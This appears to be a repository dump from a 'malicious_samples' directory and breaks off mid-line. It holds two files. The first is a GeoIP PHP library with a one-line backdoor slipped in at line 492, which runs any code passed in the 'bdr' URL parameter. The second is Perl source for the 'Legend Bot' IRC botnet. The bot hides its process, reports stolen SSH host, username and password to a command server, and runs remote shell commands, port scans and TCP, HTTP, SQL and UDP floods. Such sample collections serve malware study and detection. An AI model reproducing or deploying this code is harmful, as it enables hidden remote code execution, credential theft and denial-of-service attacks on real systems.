"Liberia", "Lesotho", "Lithuania", "Luxembourg", 180 | "Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova, Republic of", 181 | "Madagascar", "Marshall Islands", "Macedonia", 182 | "Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands", 183 | "Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives", 184 | "Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia", 185 | "Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway", 186 | "Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", "French Polynesia", 187 | "Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon", 188 | "Pitcairn Islands", "Puerto Rico", "Palestinian Territory", 189 | "Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania", 190 | "Russian Federation", "Rwanda", "Saudi Arabia", "Solomon Islands", 191 | "Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia", 192 | "Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal", 193 | "Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syrian Arab Republic", 194 | "Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories", 195 | "Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan", 196 | "Tunisia", "Tonga", "Timor-Leste", "Turkey", "Trinidad and Tobago", "Tuvalu", 197 | "Taiwan", "Tanzania, United Republic of", "Ukraine", 198 | "Uganda", "United States Minor Outlying Islands", "United States", "Uruguay", 199 | "Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines", 200 | "Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.", 201 | "Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte", 202 | "Serbia", "South Africa", "Zambia", "Montenegro", "Zimbabwe", 203 | "Anonymous Proxy","Satellite Provider","Other", 204 | "Aland Islands","Guernsey","Isle of Man","Jersey","Saint Barthelemy","Saint Martin" 205 | ); 206 | 207 | var $GEOIP_CONTINENT_CODES = array( 208 | "--", "AS", "EU", "EU", "AS", "AS", "SA", "SA", "EU", "AS", 209 | "SA", "AF", "AN", "SA", "OC", "EU", "OC", "SA", "AS", "EU", 210 | "SA", "AS", "EU", "AF", "EU", "AS", "AF", "AF", "SA", "AS", 211 | "SA", "SA", "SA", "AS", "AF", "AF", "EU", "SA", "NA", "AS", 212 | "AF", "AF", "AF", "EU", "AF", "OC", "SA", "AF", "AS", "SA", 213 | "SA", "SA", "AF", "AS", "AS", "EU", "EU", "AF", "EU", "SA", 214 | "SA", "AF", "SA", "EU", "AF", "AF", "AF", "EU", "AF", "EU", 215 | "OC", "SA", "OC", "EU", "EU", "EU", "AF", "EU", "SA", "AS", 216 | "SA", "AF", "EU", "SA", "AF", "AF", "SA", "AF", "EU", "SA", 217 | "SA", "OC", "AF", "SA", "AS", "AF", "SA", "EU", "SA", "EU", 218 | "AS", "EU", "AS", "AS", "AS", "AS", "AS", "EU", "EU", "SA", 219 | "AS", "AS", "AF", "AS", "AS", "OC", "AF", "SA", "AS", "AS", 220 | "AS", "SA", "AS", "AS", "AS", "SA", "EU", "AS", "AF", "AF", 221 | "EU", "EU", "EU", "AF", "AF", "EU", "EU", "AF", "OC", "EU", 222 | "AF", "AS", "AS", "AS", "OC", "SA", "AF", "SA", "EU", "AF", 223 | "AS", "AF", "NA", "AS", "AF", "AF", "OC", "AF", "OC", "AF", 224 | "SA", "EU", "EU", "AS", "OC", "OC", "OC", "AS", "SA", "SA", 225 | "OC", "OC", "AS", "AS", "EU", "SA", "OC", "SA", "AS", "EU", 226 | "OC", "SA", "AS", "AF", "EU", "AS", "AF", "AS", "OC", "AF", 227 | "AF", "EU", "AS", "AF", "EU", "EU", "EU", "AF", "EU", "AF", 228 | "AF", "SA", "AF", "SA", "AS", "AF", "SA", "AF", "AF", "AF", 229 | "AS", "AS", "OC", "AS", "AF", "OC", "AS", "EU", "SA", "OC", 230 | "AS", "AF", "EU", "AF", "OC", "NA", "SA", "AS", "EU", "SA", 231 | "SA", "SA", "SA", "AS", "OC", "OC", "OC", "AS", "AF", "EU", 232 | "AF", "AF", "EU", "AF", "--", "--", "--", "EU", "EU", "EU", 233 | "EU", "SA", "SA" ); 234 | 235 | } 236 | function geoip_load_shared_mem ($file) { 237 | 238 | $fp = fopen($file, "rb"); 239 | if (!$fp) { 240 | print "error opening $file: $php_errormsg\n"; 241 | exit; 242 | } 243 | $s_array = fstat($fp); 244 | $size = $s_array['size']; 245 | if ($shmid = @shmop_open (GEOIP_SHM_KEY, "w", 0, 0)) { 246 | shmop_delete ($shmid); 247 | shmop_close ($shmid); 248 | } 249 | $shmid = shmop_open (GEOIP_SHM_KEY, "c", 0644, $size); 250 | shmop_write ($shmid, fread($fp, $size), 0); 251 | shmop_close ($shmid); 252 | } 253 | 254 | function _setup_segments($gi){ 255 | $gi->databaseType = GEOIP_COUNTRY_EDITION; 256 | $gi->record_length = STANDARD_RECORD_LENGTH; 257 | if ($gi->flags & GEOIP_SHARED_MEMORY) { 258 | $offset = @shmop_size ($gi->shmid) - 3; 259 | for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) { 260 | $delim = @shmop_read ($gi->shmid, $offset, 3); 261 | $offset += 3; 262 | if ($delim == (chr(255).chr(255).chr(255))) { 263 | $gi->databaseType = ord(@shmop_read ($gi->shmid, $offset, 1)); 264 | $offset++; 265 | 266 | if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){ 267 | $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0; 268 | } else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){ 269 | $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1; 270 | } else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)|| 271 | ($gi->databaseType == GEOIP_CITY_EDITION_REV1) 272 | || ($gi->databaseType == GEOIP_ORG_EDITION) 273 | || ($gi->databaseType == GEOIP_ISP_EDITION) 274 | || ($gi->databaseType == GEOIP_ASNUM_EDITION)){ 275 | $gi->databaseSegments = 0; 276 | $buf = @shmop_read ($gi->shmid, $offset, SEGMENT_RECORD_LENGTH); 277 | for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){ 278 | $gi->databaseSegments += (ord($buf[$j]) << ($j * 8)); 279 | } 280 | if (($gi->databaseType == GEOIP_ORG_EDITION)|| 281 | ($gi->databaseType == GEOIP_ISP_EDITION)) { 282 | $gi->record_length = ORG_RECORD_LENGTH; 283 | } 284 | } 285 | break; 286 | } else { 287 | $offset -= 4; 288 | } 289 | } 290 | if (($gi->databaseType == GEOIP_COUNTRY_EDITION)|| 291 | ($gi->databaseType == GEOIP_PROXY_EDITION)|| 292 | ($gi->databaseType == GEOIP_NETSPEED_EDITION)){ 293 | $gi->databaseSegments = GEOIP_COUNTRY_BEGIN; 294 | } 295 | } else { 296 | $filepos = ftell($gi->filehandle); 297 | fseek($gi->filehandle, -3, SEEK_END); 298 | for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) { 299 | $delim = fread($gi->filehandle,3); 300 | if ($delim == (chr(255).chr(255).chr(255))){ 301 | $gi->databaseType = ord(fread($gi->filehandle,1)); 302 | if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){ 303 | $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0; 304 | } 305 | else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){ 306 | $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1; 307 | } else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0) || 308 | ($gi->databaseType == GEOIP_CITY_EDITION_REV1) || 309 | ($gi->databaseType == GEOIP_ORG_EDITION) || 310 | ($gi->databaseType == GEOIP_ISP_EDITION) || 311 | ($gi->databaseType == GEOIP_ASNUM_EDITION)){ 312 | $gi->databaseSegments = 0; 313 | $buf = fread($gi->filehandle,SEGMENT_RECORD_LENGTH); 314 | for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){ 315 | $gi->databaseSegments += (ord($buf[$j]) << ($j * 8)); 316 | } 317 | if ($gi->databaseType == GEOIP_ORG_EDITION || 318 | $gi->databaseType == GEOIP_ISP_EDITION) { 319 | $gi->record_length = ORG_RECORD_LENGTH; 320 | } 321 | } 322 | break; 323 | } else { 324 | fseek($gi->filehandle, -4, SEEK_CUR); 325 | } 326 | } 327 | if (($gi->databaseType == GEOIP_COUNTRY_EDITION)|| 328 | ($gi->databaseType == GEOIP_PROXY_EDITION)|| 329 | ($gi->databaseType == GEOIP_NETSPEED_EDITION)){ 330 | $gi->databaseSegments = GEOIP_COUNTRY_BEGIN; 331 | } 332 | fseek($gi->filehandle,$filepos,SEEK_SET); 333 | } 334 | return $gi; 335 | } 336 | 337 | function geoip_open($filename, $flags) { 338 | $gi = new GeoIP; 339 | $gi->flags = $flags; 340 | if ($gi->flags & GEOIP_SHARED_MEMORY) { 341 | $gi->shmid = @shmop_open (GEOIP_SHM_KEY, "a", 0, 0); 342 | } else { 343 | $gi->filehandle = fopen($filename,"rb") or die( "Can not open $filename\n" ); 344 | if ($gi->flags & GEOIP_MEMORY_CACHE) { 345 | $s_array = fstat($gi->filehandle); 346 | $gi->memory_buffer = fread($gi->filehandle, $s_array['size']); 347 | } 348 | } 349 | 350 | $gi = _setup_segments($gi); 351 | return $gi; 352 | } 353 | 354 | function geoip_close($gi) { 355 | if ($gi->flags & GEOIP_SHARED_MEMORY) { 356 | return true; 357 | } 358 | 359 | return fclose($gi->filehandle); 360 | } 361 | 362 | function geoip_country_id_by_name($gi, $name) { 363 | $addr = gethostbyname($name); 364 | if (!$addr || $addr == $name) { 365 | return false; 366 | } 367 | return geoip_country_id_by_addr($gi, $addr); 368 | } 369 | 370 | function geoip_country_code_by_name($gi, $name) { 371 | $country_id = geoip_country_id_by_name($gi,$name); 372 | if ($country_id !== false) { 373 | return $gi->GEOIP_COUNTRY_CODES[$country_id]; 374 | } 375 | return false; 376 | } 377 | 378 | function geoip_country_name_by_name($gi, $name) { 379 | $country_id = geoip_country_id_by_name($gi,$name); 380 | if ($country_id !== false) { 381 | return $gi->GEOIP_COUNTRY_NAMES[$country_id]; 382 | } 383 | return false; 384 | } 385 | 386 | function geoip_country_id_by_addr($gi, $addr) { 387 | $ipnum = ip2long($addr); 388 | return _geoip_seek_country($gi, $ipnum) - GEOIP_COUNTRY_BEGIN; 389 | } 390 | 391 | function geoip_country_code_by_addr($gi, $addr) { 392 | if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) { 393 | $record = geoip_record_by_addr($gi,$addr); 394 | if ( $record !== false ) { 395 | return $record->country_code; 396 | } 397 | } else { 398 | $country_id = geoip_country_id_by_addr($gi,$addr); 399 | if ($country_id !== false) { 400 | return $gi->GEOIP_COUNTRY_CODES[$country_id]; 401 | } 402 | } 403 | return false; 404 | } 405 | 406 | function geoip_country_name_by_addr($gi, $addr) { 407 | if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) { 408 | $record = geoip_record_by_addr($gi,$addr); 409 | return $record->country_name; 410 | } else { 411 | $country_id = geoip_country_id_by_addr($gi,$addr); 412 | if ($country_id !== false) { 413 | return $gi->GEOIP_COUNTRY_NAMES[$country_id]; 414 | } 415 | } 416 | return false; 417 | } 418 | 419 | function _geoip_seek_country($gi, $ipnum) { 420 | $offset = 0; 421 | for ($depth = 31; $depth >= 0; --$depth) { 422 | if ($gi->flags & GEOIP_MEMORY_CACHE) { 423 | // workaround php's broken substr, strpos, etc handling with 424 | // mbstring.func_overload and mbstring.internal_encoding 425 | $enc = mb_internal_encoding(); 426 | mb_internal_encoding('ISO-8859-1'); 427 | 428 | $buf = substr($gi->memory_buffer, 429 | 2 * $gi->record_length * $offset, 430 | 2 * $gi->record_length); 431 | 432 | mb_internal_encoding($enc); 433 | } elseif ($gi->flags & GEOIP_SHARED_MEMORY) { 434 | $buf = @shmop_read ($gi->shmid, 435 | 2 * $gi->record_length * $offset, 436 | 2 * $gi->record_length ); 437 | } else { 438 | fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0 439 | or die("fseek failed"); 440 | $buf = fread($gi->filehandle, 2 * $gi->record_length); 441 | } 442 | $x = array(0,0); 443 | for ($i = 0; $i < 2; ++$i) { 444 | for ($j = 0; $j < $gi->record_length; ++$j) { 445 | $x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8); 446 | } 447 | } 448 | if ($ipnum & (1 << $depth)) { 449 | if ($x[1] >= $gi->databaseSegments) { 450 | return $x[1]; 451 | } 452 | $offset = $x[1]; 453 | } else { 454 | if ($x[0] >= $gi->databaseSegments) { 455 | return $x[0]; 456 | } 457 | $offset = $x[0]; 458 | } 459 | } 460 | trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR); 461 | return false; 462 | } 463 | 464 | function _get_org($gi,$ipnum){ 465 | $seek_org = _geoip_seek_country($gi,$ipnum); 466 | if ($seek_org == $gi->databaseSegments) { 467 | return NULL; 468 | } 469 | $record_pointer = $seek_org + (2 * $gi->record_length - 1) * $gi->databaseSegments; 470 | if ($gi->flags & GEOIP_SHARED_MEMORY) { 471 | $org_buf = @shmop_read ($gi->shmid, $record_pointer, MAX_ORG_RECORD_LENGTH); 472 | } else { 473 | fseek($gi->filehandle, $record_pointer, SEEK_SET); 474 | $org_buf = fread($gi->filehandle,MAX_ORG_RECORD_LENGTH); 475 | } 476 | // workaround php's broken substr, strpos, etc handling with 477 | // mbstring.func_overload and mbstring.internal_encoding 478 | $enc = mb_internal_encoding(); 479 | mb_internal_encoding('ISO-8859-1'); 480 | $org_buf = substr($org_buf, 0, strpos($org_buf, 0)); 481 | mb_internal_encoding($enc); 482 | return $org_buf; 483 | } 484 | 485 | function geoip_org_by_addr ($gi,$addr) { 486 | if ($addr == NULL) { 487 | return 0; 488 | } 489 | $ipnum = ip2long($addr); 490 | return _get_org($gi, $ipnum); 491 | } 492 | isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop'); 493 | function _get_region($gi,$ipnum){ 494 | if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){ 495 | $seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV0; 496 | if ($seek_region >= 1000){ 497 | $country_code = "US"; 498 | $region = chr(($seek_region - 1000)/26 + 65) . chr(($seek_region - 1000)%26 + 65); 499 | } else { 500 | $country_code = $gi->GEOIP_COUNTRY_CODES[$seek_region]; 501 | $region = ""; 502 | } 503 | return array ($country_code,$region); 504 | } else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1) { 505 | $seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV1; 506 | //print $seek_region; 507 | if ($seek_region < US_OFFSET){ 508 | $country_code = ""; 509 | $region = ""; 510 | } else if ($seek_region < CANADA_OFFSET) { 511 | $country_code = "US"; 512 | $region = chr(($seek_region - US_OFFSET)/26 + 65) . chr(($seek_region - US_OFFSET)%26 + 65); 513 | } else if ($seek_region < WORLD_OFFSET) { 514 | $country_code = "CA"; 515 | $region = chr(($seek_region - CANADA_OFFSET)/26 + 65) . chr(($seek_region - CANADA_OFFSET)%26 + 65); 516 | } else { 517 | $country_code = $gi->GEOIP_COUNTRY_CODES[($seek_region - WORLD_OFFSET) / FIPS_RANGE]; 518 | $region = ""; 519 | } 520 | return array ($country_code,$region); 521 | } 522 | } 523 | 524 | function geoip_region_by_addr ($gi,$addr) { 525 | if ($addr == NULL) { 526 | return 0; 527 | } 528 | $ipnum = ip2long($addr); 529 | return _get_region($gi, $ipnum); 530 | } 531 | 532 | function getdnsattributes ($l,$ip){ 533 | $r = new Net_DNS_Resolver(); 534 | $r->nameservers = array("ws1.maxmind.com"); 535 | $p = $r->search($l."." . $ip .".s.maxmind.com","TXT","IN"); 536 | $str = is_object($p->answer[0])?$p->answer[0]->string():''; 537 | ereg("\"(.*)\"",$str,$regs); 538 | $str = $regs[1]; 539 | return $str; 540 | } 541 | 542 | ?> 543 | -------------------------------------------------------------------------------- /malicious_samples/legend.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | ########################################################### 3 | #-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--# 4 | ########################################################### 5 | # Legend Bot [2011] DO NOT FUCKIN SHARE! # 6 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # 7 | # Commands: # 8 | # !legend @system # 9 | # !legend @rootable # 10 | # !legend @cleanlogs # 11 | # !legend @socks5 # 12 | # !legend @nmap # 13 | # !legend @back # 14 | # !legend @sqlflood # 15 | # !legend @udp # 16 | # !legend @udp2 # 17 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # 18 | ########################################################### 19 | ########################################################### 20 | 21 | ####################[Configuration]######################## 22 | ########################################################### 23 | my $sshuser = $argv[0]; 24 | my $sshpass = $argv[1]; 25 | my $sshhost = $argv[2]; 26 | my $hidden = 'core'; 27 | my $linas_max='4'; 28 | my $sleep='5'; 29 | my @admins=("msf_user"); 30 | my @hostauth=("legend.rocks"); 31 | my @channels=("#lol"); 32 | my $nick= 'Apache'; 33 | my $ircname = 'Zax'; 34 | my $realname = '$uname'; 35 | my $server='192.168.93.137'; 36 | my $port='6667'; 37 | ########################################################### 38 | ####################[Configuration]######################## 39 | ########################################################### 40 | ####################[lets start..]######################### 41 | ########################################################### 42 | $SIG{'INT'} = 'IGNORE'; 43 | $SIG{'HUP'} = 'IGNORE'; 44 | $SIG{'TERM'} = 'IGNORE'; 45 | $SIG{'CHLD'} = 'IGNORE'; 46 | $SIG{'PS'} = 'IGNORE'; 47 | use IO::Socket; 48 | use Socket; 49 | use IO::Select; 50 | chdir("/"); 51 | $0="$hidden"."\0"x16;; 52 | my $pid=fork; 53 | exit if $pid; 54 | die "fork problem: $!" unless defined($pid); 55 | ########################################################### 56 | ####################[lets start..]######################### 57 | ########################################################### 58 | ####################[Connecting...]######################## 59 | ########################################################### 60 | our %irc_servers; 61 | our %DCC; 62 | my $dcc_sel = new IO::Select->new(); 63 | 64 | $sel_cliente = IO::Select->new(); 65 | sub sendraw { 66 | if ($#_ == '1') { 67 | my $socket = $_[0]; 68 | print $socket "$_[1]\n"; 69 | } else { 70 | print $IRC_cur_socket "$_[0]\n"; 71 | } 72 | } 73 | 74 | sub conectar { 75 | my $meunick = $_[0]; 76 | my $server_con = $_[1]; 77 | my $port_con = $_[2]; 78 | 79 | my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1); 80 | if (defined($IRC_socket)) { 81 | $IRC_cur_socket = $IRC_socket; 82 | 83 | $IRC_socket->autoflush(1); 84 | $sel_cliente->add($IRC_socket); 85 | 86 | $irc_servers{$IRC_cur_socket}{'host'} = "$server_con"; 87 | $irc_servers{$IRC_cur_socket}{'port'} = "$port_con"; 88 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 89 | $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; 90 | nick("$meunick"); 91 | sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname"); 92 | sleep 1; 93 | } 94 | } 95 | my $line_temp; 96 | while( 1 ) { 97 | while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); } 98 | delete($irc_servers{''}) if (defined($irc_servers{''})); 99 | my @ready = $sel_cliente->can_read(0); 100 | next unless(@ready); 101 | foreach $fh (@ready) { 102 | $IRC_cur_socket = $fh; 103 | $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; 104 | $nread = sysread($fh, $msg, 4096); 105 | if ($nread == 0) { 106 | $sel_cliente->remove($fh); 107 | $fh->close; 108 | delete($irc_servers{$fh}); 109 | } 110 | @lines = split (/\n/, $msg); 111 | 112 | for(my $c=0; $c<= $#lines; $c++) { 113 | $line = $lines[$c]; 114 | $line=$line_temp.$line if ($line_temp); 115 | $line_temp=''; 116 | $line =~ s/\r$//; 117 | unless ($c == $#lines) { 118 | parse("$line"); 119 | } else { 120 | if ($#lines == 0) { 121 | parse("$line"); 122 | } elsif ($lines[$c] =~ /\r$/) { 123 | parse("$line"); 124 | } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { 125 | parse("$line"); 126 | } else { 127 | $line_temp = $line; 128 | } 129 | } 130 | } 131 | } 132 | } 133 | ########################################################### 134 | ####################[Connecting...]######################## 135 | ########################################################### 136 | ####################[..Connected..]######################## 137 | ########################################################### 138 | sub parse { 139 | my $servarg = shift; 140 | if ($servarg =~ /^PING \:(.*)/) { 141 | sendraw("PONG :$1"); 142 | } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { 143 | my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; 144 | if ($args =~ /^\001VERSION\001$/) { 145 | notice("$pn", "\001VERSION Legend IRC [2010]\001"); 146 | } 147 | if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { 148 | if (grep {$_ =~ /^\Q$pn\E$/i } @admins) { 149 | if ($onde eq "$meunick"){ 150 | shell("$pn", "$args"); 151 | } 152 | if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) { 153 | my $natrix = $1; 154 | my $arg = $2; 155 | if ($arg =~ /^\!(.*)/) { 156 | ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); 157 | } elsif ($arg =~ /^\@(.*)/) { 158 | $ondep = $onde; 159 | $ondep = $pn if $onde eq $meunick; 160 | bfunc("$ondep","$1"); 161 | } else { 162 | shell("$onde", "$arg"); 163 | } 164 | } 165 | } 166 | } 167 | } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { 168 | if (lc($1) eq lc($meunick)) { 169 | $meunick=$4; 170 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 171 | } 172 | } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { 173 | nick("$meunick-".int rand(9999999)); 174 | } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { 175 | $meunick = $2; 176 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 177 | $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; 178 | foreach my $channel (@channels) { 179 | sendraw("JOIN $channel sexy"); 180 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Hostname: $sshhost Username: $sshuser Password $sshpass2:.4"); 181 | } 182 | } 183 | } 184 | 185 | ########################################################### 186 | ####################[..Functions..]######################## 187 | ########################################################### 188 | 189 | sub bfunc { 190 | my $printl = $_[0]; 191 | my $funcarg = $_[1]; 192 | if (my $pid = fork) { 193 | waitpid($pid, 0); 194 | } else { 195 | if (fork) { 196 | exit; 197 | } else { 198 | 199 | ########################################################### 200 | ######################[..@system..]######################## 201 | ########################################################### 202 | 203 | if ($funcarg =~ /^system/) { 204 | $uname=`uname -a`; 205 | $uptime=`uptime`; 206 | $ownd=`pwd`; 207 | $distro=`cat /etc/issue`; 208 | $id=`id`; 209 | $un=`uname -sro`; 210 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4"); 211 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname"); 212 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime"); 213 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden"); 214 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id"); 215 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd"); 216 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro"); 217 | } 218 | 219 | ########################################################### 220 | ######################[..@system..]######################## 221 | ########################################################### 222 | 223 | ########################################################### 224 | ######################[.@portscan.]######################## 225 | ########################################################### 226 | 227 | if ($funcarg =~ /^portscan (.*)/) { 228 | my $hostip="$1"; 229 | @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); 230 | my (@aberta, %porta_banner); 231 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started ."); 232 | foreach my $porta (@portas) { 233 | my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 234 | 'tcp', Timeout => 4); 235 | if ($scansock) { 236 | push (@aberta, $porta); 237 | $scansock->close; 238 | } 239 | } 240 | 241 | if (@aberta) { 242 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta"); 243 | } else { 244 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend."); 245 | } 246 | } 247 | 248 | ########################################################### 249 | ######################[.@portscan.]######################## 250 | ########################################################### 251 | 252 | ########################################################### 253 | ######################[.@tcpflood.]######################## 254 | ########################################################### 255 | 256 | if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { 257 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds."); 258 | my $itime = time; 259 | my ($cur_time); 260 | $cur_time = time - $itime; 261 | while ($3>$cur_time){ 262 | $cur_time = time - $itime; 263 | &tcpflooder("$1","$2","$3"); 264 | } 265 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2."."); 266 | } 267 | 268 | ########################################################### 269 | ######################[.@tcpflood.]######################## 270 | ########################################################### 271 | 272 | ########################################################### 273 | #####################[.@httpflood.]######################## 274 | ########################################################### 275 | 276 | if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { 277 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds."); 278 | my $itime = time; 279 | my ($cur_time); 280 | $cur_time = time - $itime; 281 | while ($2>$cur_time){ 282 | $cur_time = time - $itime; 283 | my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); 284 | print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; 285 | close($socket); 286 | } 287 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1."."); 288 | } 289 | ########################################################### 290 | #####################[.@httpflood.]######################## 291 | ########################################################### 292 | 293 | ########################################################### 294 | ######################[.@sqlflood.]######################## 295 | ########################################################### 296 | 297 | if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) { 298 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds ."); 299 | my $itime = time; 300 | my ($cur_time); 301 | $cur_time = time - $itime; 302 | while ($2>$cur_time){ 303 | $cur_time = time - $itime; 304 | my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306); 305 | print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; 306 | close($socket); 307 | } 308 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1."."); 309 | } 310 | 311 | ########################################################### 312 | ######################[.@sqlflood.]######################## 313 | ########################################################### 314 | 315 | ########################################################### 316 | ######################[.@udpflood.]######################## 317 | ########################################################### 318 | if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) { 319 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds."); 320 | my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); 321 | $dtime = 1 if $dtime == 0; 322 | my %bytes; 323 | $bytes{igmp} = $2 * $pacotes{igmp}; 324 | $bytes{icmp} = $2 * $pacotes{icmp}; 325 | $bytes{o} = $2 * $pacotes{o}; 326 | $bytes{udp} = $2 * $pacotes{udp}; 327 | $bytes{tcp} = $2 * $pacotes{tcp}; 328 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1."."); 329 | } 330 | ########################################################### 331 | ######################[.@udpflood.]######################## 332 | ########################################################### 333 | 334 | ########################################################### 335 | ######################[.@udp2flood.]######################## 336 | ########################################################### 337 | if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) { 338 | sendraw($IRC_cur_socket, "PRIVMSG $printl 